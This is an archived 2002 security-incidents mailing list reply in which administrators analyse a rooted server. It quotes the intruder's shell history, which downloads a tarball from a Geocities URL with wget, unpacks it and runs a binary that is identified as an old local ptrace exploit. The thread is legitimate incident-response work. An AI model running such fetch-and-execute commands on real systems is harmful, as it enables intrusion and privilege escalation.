Security Incidents mailing list archives

Re: Rooted, .haos on system

From: Carlos Eduardo Pedroza Santiviago <segfault () brturbo com>
Date: Mon, 16 Dec 2002 18:31:03 -0200

On Mon, 16 Dec 2002 13:47:28 -0500
Damian Gerow <damian () sentex net> wrote:

On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:

On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:

I've just received word that one of our customers was rooted, and he's
asking about the file ".haos".  Nothing rings any bells, has anyone heard
of it?


Just a quick update to this...


And one last tidbit...

Left in the .bash_history was this:

        w
        cd /tmp
        wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
        ./epc

A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.


No, for me this looks like:
        epc -> ptrace local exploit
        su -> su local exploit

They're old shit, and i guess your system wasn't updated.


I've already notified Geocities abuse, and haven't heard back from them
yet.


Good luck,

-- 
Carlos Eduardo Pedroza Santiviago -- <segfault@*NO_SPAM*brturbo.com>
Key id/fp = 4B5EB579/A817 71A3 AA78 1997 65DA  0665 A341 D4A4 4B5E B579

Attachment: _bin
Description:

Current thread:

Rooted, .haos on system Damian Gerow (Dec 15)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
  - Re: Rooted, .haos on system Damian Gerow (Dec 16)
    - Re: Rooted, .haos on system Mike Katz (Dec 16)
    - Re: Rooted, .haos on system zeno (Dec 16)
    - Re: Rooted, .haos on system Carlos Eduardo Pedroza Santiviago (Dec 16)
    - Re: Rooted, .haos on system Damian Gerow (Dec 16)
    - Message not available
    - Re: Rooted, .haos on system Julian Young (Dec 17)
    - New CIFS (port 445) worm? David Gillett (Dec 17)
    - Re: New CIFS (port 445) worm? Zen (Dec 17)
  - Re[2]: Rooted, .haos on system Oliver.C.Rochford CFH (Dec 17)
- Re: Rooted, .haos on system Mattias Hedenskog (Dec 16)
  - Re: Rooted, .haos on system zeno (Dec 16)